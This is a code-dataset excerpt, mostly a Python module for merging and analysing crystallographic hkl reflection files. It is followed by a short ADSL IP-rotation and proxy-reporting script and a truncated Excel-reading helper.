plt.figure(figsize=(22,5), dpi=100)\n axes = plt.subplot(111) \n label1 = axes.scatter(theta_list1, inte_list1, s=30, c='red')\n label2 = axes.scatter(theta_list2, inte_list2, s=30, c='blue')\n plt.xlabel('2 theta, wavelength = 0.02508 angstrom')\n plt.ylabel('Intensity')\n axes.legend((label1, label2), ('hkl-1', 'hkl-2'), loc=1)\n plt.show()\n\ndef scale_cal(data1, data2): \n \"\"\"\n function to calculate the scale of two data set, return the calculated scale and repeated hkl list.\n\n data1 and data2: list include 5 list of h, k, l, Intensity and Sigma.\n\n Return: repeat_data, a list to record the positions of repeated hkl in data2 or hkl2. \n scale_calculated: a float number, recording the averaged scale of hkl1/hkl2. \n \n \"\"\"\n repeat_data, scale = [], []\n for i in range(len(data1[0])):\n for j in range(len(data2[0])):\n if data1[0][i] == data2[0][j] and data1[1][i] == data2[1][j] and data1[2][i] == data2[2][j]:\n repeat_data.append(j)\n data1_temp = data1[3][i]\n data2_temp = data2[3][j]\n scale.append(data1_temp/data2_temp)\n scale_square_sum = 0\n for k in range(len(scale)):\n scale_square_sum += np.square(scale[k])\n if len(scale):\n scale_calculated = np.sqrt(scale_square_sum / len(scale)) \n return repeat_data, scale_calculated\n else: \n print(\"Something wrong happended!\")\n pass \n\ndef merge2hkl(hkl_file1, hkl_file2, filename_merge): \n \"\"\"\n function to merge two hkl file, with two data set and calculated scale and repeated hkl list, you can merge your data now.\n\n hkl_file1 and hkl_file2: string, e.g. \"Sky_worker.hkl\"\n\n filename_merge: string, e.g. \"Sky_worker.hkl\"\n\n Return: merged hkl file.\n\n There are two different situlation: scale > 1 or scale < 1.\n \n \"\"\"\n data1, data2 = read_hkl(hkl_file1), read_hkl(hkl_file2)\n repeat_data2, scale_c = scale_cal(data1, data2)\n print(\"There are %s reflections repeated.\" % len(repeat_data2))\n print(\"The scale of data1 / data2 is:\", scale_c)\n if scale_c > 1.0:\n data1[3] = np.array(data1[3]) / scale_c \n data1[3] = list(data1[3]) \n data = data1\n for i in range(len(data2[0])):\n if i in repeat_data2:\n continue \n data[0].append(data2[0][i])\n data[1].append(data2[1][i])\n data[2].append(data2[2][i])\n data[3].append(data2[3][i])\n data[4].append(data2[4][i])\n if len(data[0]) == len(data[1]) == len(data[2]) == len(data[3]) == len(data[4]):\n return produce_new_hkl(data, filename_merge) \n else:\n print(\"Something wrong happended!\") \n pass \n\n elif scale_c >0 and scale_c <= 1.0:\n data = data1 \n data2[3] = np.array(data2[3]) * scale_c \n data2[3] = list(data2[3])\n for i in range(len(data2[0])):\n if i in repeat_data2:\n continue \n data[0].append(data2[0][i])\n data[1].append(data2[1][i])\n data[2].append(data2[2][i])\n data[3].append(data2[3][i])\n data[4].append(data2[4][i])\n if len(data[0]) == len(data[1]) == len(data[2]) == len(data[3]) == len(data[4]):\n return produce_new_hkl(data, filename_merge)\n else:\n print(\"Something wrong happended!\") \n pass \n else:\n print(\"You got a big problem!\")\n pass \n\n\ndef reduce_list(a_list=[]):\n \"\"\"\n to reduce the repeated hkl in one list which is not hashable, therefore set() function can not be used. \n\n a_list: a list of hkl indices.\n\n Return: non-repeated hkl list.\n\n \"\"\"\n b_list = a_list \n c_list = []\n for i in range(len(b_list)):\n if b_list[i] not in c_list:\n c_list.append(b_list[i])\n return c_list\n\ndef sym_related(space_group, filename_hkl, filename_new='new.hkl'): \n \"\"\" \n function to merge all symmetry related reflecitons in one hkl file. \n\n space_group: string, e.g. 'Pnma'.\n\n filename_hkl: e.g. ‘MFI.hkl’\n\n Return: generate a new merged hkl file.\n \"\"\"\n data = read_hkl(filename_hkl)\n laue_group = laue_c2py(spg2laue(2, space_group))\n h1, k1, l1, Inte1, Sigma1 = data[0], data[1], data[2], data[3], data[4]\n data_new = []\n for p in range(len(h1)): # loop all the hkl lsit\n p_related_reflection = sym_rela_ref(laue_group, h1[p], k1[p], l1[p]) # find the symmetry related reflections using laue group\n p_related_reflection = reduce_list(p_related_reflection) # for some hkl, there are same element in the list. \n prr = p_related_reflection # use a easier name\n ref_count = [] # a list to record symmetry related reflections\n sum_Inte = 0 # record the intensity information\n if len(prr) > 1: # generally prr should be larger than 1\n for i in range(len(prr)): # loop the prr and hkl list, to find the symmetry related reflections\n for j in range(len(h1)):\n if prr[i] == [h1[j], k1[j], l1[j]] and prr[i] != [h1[p], k1[p], l1[p]]: # if find, record the positions\n ref_count.append(j) # record the positions \n sum_Inte += Inte1[j] # record the sumation of intensity\n average_Inte = (sum_Inte + Inte1[p]) / (len(ref_count) + 1) # calculate the average intensity of all symmetry related reflecitons\n Inte1[p] = average_Inte # apply the average intensity to p reflection\n for m in range(len(ref_count)):\n Inte1[ref_count[m]] = average_Inte # apply the average instensity to all symmetry related reflecitons\n else:\n pass\n if len(h1) == len(k1) == len(l1) == len(Inte1) == len(Sigma1): # make sure the length of all list are same\n data_new.append(h1)\n data_new.append(k1)\n data_new.append(l1)\n data_new.append(Inte1)\n data_new.append(Sigma1)\n return produce_new_hkl(data_new, filename_new) \n\ndef sym_related_unique(space_group, filename_hkl, filename_unique, filename_new='unique.hkl', maxh = 30, maxk = 30, maxl = 30): \n \"\"\"\n function to obtain uniuqe hkl file.\n\n space_group: string, e.g. 'Pnma'. \n\n filename: e.g. 'MFI.hkl'\n\n filename_unique: sginfo will generate a unique txt file. \n\n filename_new: The name of unique reflections hkl file you want to generate. \n \"\"\"\n data = read_hkl(filename_hkl)\n gene_unique_reflection(space_group, filename_unique, maxh, maxk, maxl)\n laue_group = laue_c2py(spg2laue(2, space_group))\n print(\"The laue group of space group %s is: %s \" % (space_group, laue_group))\n unique = np.loadtxt(filename_unique) # load the unique hkl list\n h1, k1, l1, Inte1, Sigma1 = data[0], data[1], data[2], data[3], data[4] # extract column from data\n unique_gene = np.empty(shape=[0, 5]) # numpy array used to store unique hkl list\n for i in range(len(unique)):\n i_full = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2])) # generate symmetry related reflections of hkl \n i_full = reduce_list(i_full)\n unique_temp = np.empty(shape = [1, 5])\n sum_temp = [] # for an unique reflection, to store reflections were symmmetry related to the unique reflection\n for j in range(len(h1)):\n if list((int(h1[j]), int(k1[j]), int(l1[j]))) in i_full:\n sum_temp.append(j)\n if len(sum_temp):\n sum_inte = 0\n for k in range(len(sum_temp)):\n sum_inte += Inte1[sum_temp[k]] # add intensity of all symmetry related reflections and then calculate average value \n intensity = sum_inte / len(sum_temp)\n unique_temp[0][0] = unique[i][0]\n unique_temp[0][1] = unique[i][1]\n unique_temp[0][2] = unique[i][2]\n unique_temp[0][3] = intensity # use average intensity\n unique_temp[0][4] = 0.0\n unique_gene = np.append(unique_gene, unique_temp, axis = 0)\n return produce_new_hkl2(unique_gene, filename_new)\n\ndef sym_related_single(space_group, p, data):\n \"\"\" function to check the symmetry related reflections of one specific reflection.\n \n laue_group: string such as 'mmm'. \n\n p: the reflection of number p.\n\n data: a list include 5 list of h, k, l, Intensity and Sigma.\n\n Return: nothing but it will tell you some information about this reflection and its symmetry related reflections\n \n \"\"\"\n laue_group = laue_c2py(spg2laue(2, space_group))\n h1, k1, l1, Inte1, Sigma1 = data[0], data[1], data[2], data[3], data[4]\n print('The original reflection and its intensity: ', (h1[p], k1[p], l1[p]), Inte1[p])\n related_reflection = sym_rela_ref(laue_group, h1[p], k1[p], l1[p]) \n related_reflection = reduce_list(related_reflection)\n rr = related_reflection\n ref_count = []\n sym_inte = []\n sum_Inte = 0\n for i in range(len(rr)):\n for j in range(len(h1)):\n if rr[i] == [h1[j], k1[j], l1[j]] and rr[i] != [h1[p], k1[p], l1[p]]: \n ref_count.append(j)\n sum_Inte += Inte1[j]\n sym_inte.append(Inte1[j]) \n print('The symmetry related reflection and its intensity: ', (h1[j], k1[j], l1[j]), Inte1[j])\n average_Inte = (sum_Inte + Inte1[p]) / (len(ref_count) + 1)\n print('The symmetry related reflection numbers: ', len(ref_count))\n print('The average value of intensity of these refletions: ', average_Inte)\n sym_inte.append(Inte1[p])\n max_value = max(sym_inte)\n print(\"The max value of all symmetry related reflections: \", max_value)\n if len(sym_inte) != 0:\n for m in range(len(ref_count)):\n Inte1[ref_count[m]] = max_value \n print(\"The Intensity of reflection now: \", (h1[ref_count[m]], k1[ref_count[m]], l1[ref_count[m]]), Inte1[ref_count[m]]) \n\ndef spg2laue(num, spg): # define spg2laue function to use function in sginfo, return laue group from space group\n \"\"\"\n function to return laue group from space group. e.g. if you use ‘Pnma’ it will return 'mmm'\n\n num: a number, no special meaning, just use 2.\n\n spg: space group name, e.g. 'Pnma'.\n \n Return: the pointer of its laue group.\n \"\"\"\n libsginfo.call_lg.argtypes = (ct.c_int, ct.c_char_p)\n libsginfo.call_lg.restype = ct.c_char_p\n num = ct.c_int(num)\n spg = ct.c_char_p(spg.encode('utf-8'))\n return libsginfo.call_lg(num, spg)\n\ndef laue_c2py(laue_group): # define a function to call laue dict\n \"\"\"\n function to translate laue group of ctypes into python\n\n laue_group: laue group obtained by calling sginfo.\n \"\"\"\n laue_gp = {\n \"-1\".encode('utf-8'): \"-1\",\n \"2/m\".encode('utf-8'): \"2/m\",\n \"mmm\".encode('utf-8'): \"mmm\",\n \"4/m\".encode('utf-8'): \"4/m\",\n \"4/mmm\".encode('utf-8'): \"4/mmm\",\n \"-3\".encode('utf-8'): \"-3\",\n \"-3m1\".encode('utf-8'): \"-3m\",\n \"6m\".encode('utf-8'): \"6/m\",\n \"6/mmm\".encode('utf-8'): \"6/mmm\",\n \"m-3\".encode('utf-8'): \"m-3\",\n \"m-3m\".encode('utf-8'): \"m-3m\"}\n return laue_gp[laue_group] \n\ndef gene_unique_reflection(space_group, filename, maxh, maxk, maxl): \n \"\"\"\n function to generate independent reflection file. \n\n spg: space group name, e.g. \"Pnma\"\n\n filename: filename of the independent reflection list file you want to generate. e.g. \"MFI_unique.txt\"\n\n maxh, maxk, maxl: the maximum value of h, k, l you want to generate\n\n Return: a hkl list recording independent reflections with a limit of maxh, maxk, maxl. \n \n \"\"\"\n \n # define a function to use function in sginfo, which can generate unique reflections\n libsginfo.hkl_list.argtypes = (ct.c_char_p, ct.c_char_p, ct.c_int, ct.c_int, ct.c_int)\n libsginfo.hkl_list.restype = ct.c_int\n space_group = ct.c_char_p(space_group.encode('utf-8'))\n filename = ct.c_char_p(filename.encode('utf-8'))\n h, k, l = ct.c_int(maxh), ct.c_int(maxk), ct.c_int(maxl)\n return libsginfo.hkl_list(space_group, filename, maxh, maxk, maxl)\n\ndef absent_reflection_filter(space_group, filename, filename_filtered, filename_unique):\n \"\"\"\n function to filter systematically absent reflections in one hkl file, from full reflection hkl list (do not include systematically absent reflections).\n laue_group: laue group name, e.g. 'mmm'.\n\n filename: a string, the name of your hkl file. e.g. \"MFI.hkl\" \n\n filename_filtered: a string, the name of your filtered hkl file. e.g. \"MFI_filtered.hkl\"\n\n filename_unique: a string, the name of generated txt file of unique reflections from sginfo.\n\n Return: a filtered hkl file. \n \"\"\"\n laue_group = laue_c2py(spg2laue(2, space_group))\n full = full_hkl(laue_group, filename_unique)\n data = read_hkl(filename) # read original hkl file \n data_list = [] # store hkl list in hkl file \n filtered_data = [] # store the filtered hkl list and intensity and sigma\n h1, k1, l1, Inte1, Sigma1 = [], [], [], [], []\n for i in range(len(data[0])):\n data_list.append(list((int(data[0][i]), int(data[1][i]), int(data[2][i]))))\n for j in range(len(data_list)):\n if data_list[j] in full: # check whether a specific hkl indic is in unique reflection list\n h1.append(data[0][j])\n k1.append(data[1][j])\n l1.append(data[2][j])\n Inte1.append(data[3][j])\n Sigma1.append(data[4][j])\n if len(h1) == len(k1) == len(l1) == len(Inte1) == len(Sigma1): # make sure the length of all list are same\n filtered_data.append(h1)\n filtered_data.append(k1)\n filtered_data.append(l1)\n filtered_data.append(Inte1)\n filtered_data.append(Sigma1) \n return produce_new_hkl(filtered_data, filename_filtered)\n\ndef full_hkl(laue_group, filename_unique):\n \"\"\"\n function to generate full hkl list (do not include systematically absent reflections) from unique hkl list obtained with sginfo.\n\n laue_group: laue group name, e.g. 'mmm'.\n\n filename_unique: file name of unique hkl list. e.g. 'unique.txt' \n\n Return: list of full hkl list.\n \"\"\"\n unique = np.loadtxt(filename_unique)\n full = []\n for i in range(len(unique)):\n related_reflection = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2]))\n related_reflection = reduce_list(related_reflection) \n full.extend(related_reflection)\n return full\n\ndef dhkl_cal(crystal_system, structure, h, k , l): # 用于计算某一结构对应 hkl 的 d 值。可以满足所有晶系结构的计算\n \"\"\"\n function to calculate d value for a specific hkl indices.\n\n structure: structure object. \n\n Return: d value of hkl indices.\n\n \"\"\"\n # structure = dst.loadStructure(cif_name)\n lattice = structure.lattice\n a, b, c, alpha, beta, gamma = lattice.a, lattice.b, lattice.c, lattice.alpha, lattice.beta, lattice.gamma\n if crystal_system == 'cubic':\n d_value = a * ((h**2 + k**2 + l**2)**(-0.5))\n elif crystal_system == 'hexagonal':\n d_value = a*( ( (4/3)*(h**2 + h*k + k**2) +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n elif crystal_system == 'tetragonal':\n d_value = a*( (h**2 + k**2 +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n elif crystal_system == 'orthorhombic':\n d_value = (h**2/(a**2) + k**2/(b**2) + l**2/(c**2))**(-0.5)\n elif crystal_system == 'monoclinic':\n d_value = (np.sin(beta))*( ((h**2)/(a**2) + (k**2)*( (np.sin(beta))**2 )/(b**2) + (l**2)/(c**2) -2*h*l*(np.cos(beta))/(a*c) )**(-0.5) )\n elif crystal_system == 'triclinic':\n va = a*b*c*( (1 - (np.cos(alpha))**2 - (np.cos(beta))**2 -(np.cos(gamma))**2 + 2*(np.cos(alpha))*(np.cos(beta))*(np.cos(gamma)) )**(0.5) )\n d_value = va*((h**2)*(b**2)*(c**2)*(np.sin(alpha))**2 + (k**2)*(a**2)*(c**2)*(np.sin(beta))**2 + (l**2)*(a**2)*(b**2)*(np.sin(gamma))**2 \\\n + 2*h*k*(c**2)*a*b*((np.cos(alpha))*(np.cos(beta)) - (np.cos(gamma)) ) + 2*k*l*(a**2)*b*c*((np.cos(beta))*(np.cos(gamma)) - (np.cos(alpha)) )\\\n + 2*h*l*(b**2)*a*c*((np.cos(alpha))*(np.cos(gamma)) - (np.cos(beta)) ) )**(-0.5)\n else:\n print(\"Please input right crystal symtem: 'cubic', 'hexagonal', 'tetragonal', 'orthorhombic', 'monoclinic' or 'triclinic'.\")\n return \n return d_value\n\ndef dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, h, k , l): # 用于计算某一结构对应 hkl 的 d 值。可以满足所有晶系结构的计算\n \"\"\"\n function to calculate d value for a specific hkl indices with assigned parameters.\n\n \"\"\"\n # structure = dst.loadStructure(cif_name)\n if crystal_system == 'cubic':\n d_value = a * ((h**2 + k**2 + l**2)**(-0.5))\n elif crystal_system == 'hexagonal':\n d_value = a*( ( (4/3)*(h**2 + h*k + k**2) +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n elif crystal_system == 'tetragonal':\n d_value = a*( (h**2 + k**2 +(l**2)*((c/a)**(-2) ) )**(-0.5) )\n elif crystal_system == 'orthorhombic':\n d_value = (h**2/(a**2) + k**2/(b**2) + l**2/(c**2))**(-0.5)\n elif crystal_system == 'monoclinic':\n d_value = (np.sin(beta))*( ((h**2)/(a**2) + (k**2)*( (np.sin(beta))**2 )/(b**2) + (l**2)/(c**2) -2*h*l*(np.cos(beta))/(a*c) )**(-0.5) )\n elif crystal_system == 'triclinic':\n va = a*b*c*( (1 - (np.cos(alpha))**2 - (np.cos(beta))**2 -(np.cos(gamma))**2 + 2*(np.cos(alpha))*(np.cos(beta))*(np.cos(gamma)) )**(0.5) )\n d_value = va*((h**2)*(b**2)*(c**2)*(np.sin(alpha))**2 + (k**2)*(a**2)*(c**2)*(np.sin(beta))**2 + (l**2)*(a**2)*(b**2)*(np.sin(gamma))**2 \\\n + 2*h*k*(c**2)*a*b*((np.cos(alpha))*(np.cos(beta)) - (np.cos(gamma)) ) + 2*k*l*(a**2)*b*c*((np.cos(beta))*(np.cos(gamma)) - (np.cos(alpha)) )\\\n + 2*h*l*(b**2)*a*c*((np.cos(alpha))*(np.cos(gamma)) - (np.cos(beta)) ) )**(-0.5)\n else:\n print(\"Please input right crystal symtem: 'cubic', 'hexagonal', 'tetragonal', 'orthorhombic', 'monoclinic' or 'triclinic'.\")\n return \n return d_value\n\ndef dhkl_cal_single(crystal_system, cif_name, h, k , l):\n \"\"\"\n function to calculate d value for a specific hkl indices.\n\n crystal_system: a string, e.g. 'cubic'. \n\n cif_name: e.g. 'MFI.cif', you need put this cif file into this folder. \n \"\"\"\n structure = dst.loadStructure(cif_name)\n return dhkl_cal(crystal_system, structure, h, k , l)\n\n\ndef hkl_file_cutoff(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, threshold, filename_new = 'hkl_cutoff.hkl'):\n \"\"\"\n function to cut off a hkl file with specific threshold.\n \"\"\"\n print(\"The resolution of this data is:\", threshold)\n file_origin = read_hkl(filename_hkl)\n h, k, l, Inte, Sigma = [], [], [], [], []\n data = [] \n if len(file_origin[0]):\n for i in range(len(file_origin[0])):\n d_value = dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, file_origin[0][i], file_origin[1][i], file_origin[2][i])\n if d_value >= threshold:\n h.append(file_origin[0][i])\n k.append(file_origin[1][i])\n l.append(file_origin[2][i])\n Inte.append(file_origin[3][i])\n Sigma.append(file_origin[4][i])\n if len(h) == len(k) == len(l) == len(Inte) == len(Sigma): # make sure the length of all list are same\n data.append(h)\n data.append(k)\n data.append(l)\n data.append(Inte)\n data.append(Sigma)\n return produce_new_hkl(data, filename_new)\n else: \n print(\"You got a big problem!\")\n pass\n\n\ndef R_int_calculation(space_group, filename_hkl, filename_unique = 'unique.txt', maxh = 30, maxk = 30, maxl = 30):\n \"\"\"\n function to calculate R_int value of a hkl file.\n\n space_group: e.g. 'Pnma'. \n\n filename_hkl: e.g. 'MFI.hkl'.\n\n filename_unique: e.g. 'MFI_unique.txt'\n\n Return: R_int value of this data.\n \n \"\"\"\n data = read_hkl(filename_hkl)\n laue_group = laue_c2py(spg2laue(2, space_group))\n gene_unique_reflection(space_group, filename_unique, maxh, maxk, maxl)\n unique = np.loadtxt(filename_unique)\n R_int = []\n for i in range(len(unique)):\n i_full = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2])) \n i_full = reduce_list(i_full)\n j_temp = [] \n for j in range(len(data[0])):\n if list((int(data[0][j]), int(data[1][j]), int(data[2][j]))) in i_full:\n j_temp.append(j)\n if len(j_temp):\n inte_temp = []\n for k in range(len(j_temp)):\n inte_temp.append(data[3][j_temp[k]]) \n inte_temp = np.array(inte_temp) \n R_int_temp = sum(abs(inte_temp - inte_temp.mean())) / sum(inte_temp) \n R_int.append(R_int_temp) \n if len(R_int):\n R_int = np.array(R_int)\n print(\"The R_int of this data is:\", R_int.mean())\n return R_int.mean()\n else:\n print(\"You got a huge problem!\")\n pass\n\ndef completeness(space_group, crystal_system, a, b, c, alpha, beta, gamma, filename_hkl, threshold = 0.9, filename_unique = 'unique.txt', maxh = 30, maxk = 30, maxl = 30):\n \"\"\"\n Calculate the completeness of your hkl data.\n\n space_group: e.g. 'Pnma'.\n\n crystal_system: e.g. 'orthorhombic'.\n\n a, b, c, alpha, beta, gamma: unit cell parameters.\n\n filename_hkl: string, the name of your hkl file, e.g. 'MFI.hkl'.\n\n threshold: resolution threshold set for this calculation.\n\n filename_unique: sginfo will generate a uniqe hkl list, which will be stored in a txt file. \n\n Return: completneness of your hkl data.\n \"\"\"\n data = read_hkl(filename_hkl)\n laue_group = laue_c2py(spg2laue(2, space_group))\n gene_unique_reflection(space_group, filename_unique, maxh, maxk, maxl)\n unique = np.loadtxt(filename_unique)\n def absent_reflection_filter2(laue_group, data, unique):\n unique_list = []\n data_list = []\n for i in range(len(unique)):\n d_value = dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, unique[i][0], unique[i][1] , unique[i][2])\n if d_value >= threshold:\n unique_list.append(list((unique[i][0], unique[i][1] , unique[i][2])))\n i_full = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2])) \n i_full = reduce_list(i_full)\n for j in range(len(data[0])):\n if list((int(data[0][j]), int(data[1][j]), int(data[2][j]))) in i_full:\n data_list.append(list((unique[i][0], unique[i][1] , unique[i][2])))\n if len(data_list):\n data_list = reduce_list(data_list)\n return unique_list, data_list\n unique_list, data_list = absent_reflection_filter2(laue_group, data, unique)\n if len(unique_list) and len(data_list):\n comp = len(data_list) / len(unique_list)\n print(\"The completeness of your data is:\", comp)\n return comp\n \ndef hkl_file_save(hkl_list, name = 'hkl.txt'): # save hkl list into .txt file\n return np.savetxt('%s' % name, hkl_list, fmt=\"%2f\", delimiter=\" \") \n \n\n \n\n\n \n\n", "sub_path": "sayre200531/hkl_merge.py", "file_name": "hkl_merge.py", "file_ext": "py", "file_size_in_byte": 30534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "ctypes.CDLL", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.arcsin", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "numpy.square", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 322, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 341, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 359, "usage_type": "call"}, {"api_name": "ctypes.c_int", "line_number": 393, "usage_type": "attribute"}, {"api_name": "ctypes.c_char_p", "line_number": 393, "usage_type": "attribute"}, {"api_name": "ctypes.c_char_p", "line_number": 394, "usage_type": "attribute"}, {"api_name": "ctypes.c_int", "line_number": 395, "usage_type": "call"}, {"api_name": "ctypes.c_char_p", "line_number": 396, "usage_type": "call"}, {"api_name": "ctypes.c_char_p", "line_number": 434, "usage_type": "attribute"}, {"api_name": "ctypes.c_int", "line_number": 434, "usage_type": "attribute"}, {"api_name": "ctypes.c_int", "line_number": 435, "usage_type": "attribute"}, {"api_name": "ctypes.c_char_p", "line_number": 436, "usage_type": "call"}, {"api_name": "ctypes.c_char_p", "line_number": 437, "usage_type": "call"}, {"api_name": "ctypes.c_int", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 487, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 542, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 542, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 545, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 547, "usage_type": "call"}, {"api_name": "diffpy.structure.loadStructure", "line_number": 561, "usage_type": "call"}, {"api_name": "diffpy.structure", "line_number": 561, "usage_type": "name"}, {"api_name": "numpy.loadtxt", "line_number": 610, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 613, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 623, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 627, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 655, "usage_type": "call"}, {"api_name": "symmetry_related_reflection_generator.sym_rela_ref", "line_number": 663, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 678, "usage_type": "call"}]} +{"seq_id": "239399603", "text": "import os\nimport time\nimport requests\nimport netifaces as ni\nfrom lxml import etree\n\n\nflag = True\nwhile flag:\n # try:\n os.popen('adsl-stop')\n print('has stop')\n os.popen('adsl-start')\n print('has start')\n time.sleep(1)\n response = requests.get('https://ip.cn', timeout=3).text\n print('ping pang!!!')\n flag = False\n local_info = etree.HTML(response).xpath('//div[@id=\"result\"]/div/p[2]/code/text()')\n location, carrier = local_info[0].split()\n proxy = etree.HTML(response).xpath('//div[@id=\"result\"]/div/p[1]/code/text()')[0]\n # except Exception as e:\n # print(e)\nelse:\n print(location, carrier, proxy)\n os.popen('service tinyproxy restart')\n print('restart over')\n time.sleep(3)\n print('time.sleep over')\n _id = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']\n print(_id)\n res = requests.get('https://117.50.2.251/update_proxiy?id=%s&location=%s&carrier=%s&proxy=%s' % (_id, location, carrier, proxy), verify=False)\n print(res)\n print(res.text)\n", "sub_path": "change_ip.py", "file_name": "change_ip.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.popen", "line_number": 11, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 19, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 19, "usage_type": "name"}, {"api_name": "lxml.etree.HTML", "line_number": 21, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 21, "usage_type": "name"}, {"api_name": "os.popen", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "netifaces.ifaddresses", "line_number": 30, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 30, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "139904223", "text": "import pandas as pd\nfrom zipfile import BadZipfile\nfrom arcpy import SetParameterAsText\nfrom SMD_Package.OutputMessage import output_message\nimport sys\n\n\ndef read_input_excel(event_table_path, parameter_index=2):\n \"\"\"\n This function will read the submitted excel file by the SMD user, the file format has to be '.xls' or '.xlsx', if\n any other file format is submitted then this function will return None.\n :param event_table_path: The excel file path.\n :param parameter_index: Parameter index for arcpy output message.\n :return: Pandas DataFrame or NoneType.\n \"\"\"\n file_format = str(event_table_path)[-4:]\n if file_format in ['xls', 'xlsx']:\n\n try:\n df_self_dtype = pd.read_excel(event_table_path)\n s_converter = {col: str for col in list(df_self_dtype)} # Create a string converters for read_excel\n del df_self_dtype\n except IOError: # Handle error if the file path is invalid\n SetParameterAsText(parameter_index, output_message(\"Failed\", \"File tidak ditemukan.\"))\n sys.exit(0)\n except BadZipfile: # Handle corrupt file.\n SetParameterAsText(parameter_index, output_message(\"Failed\", \"File tidak dapat dibaca.\"))\n sys.exit(0)\n\n try:\n df_string = pd.read_excel(event_table_path, converters=s_converter) # Convert all column to 'str' type.\n except UnicodeEncodeError: # Handle if there is a non ascii character.\n SetParameterAsText(parameter_index, output_message(\"Failed\", \"Terdapat karakter yang tidak 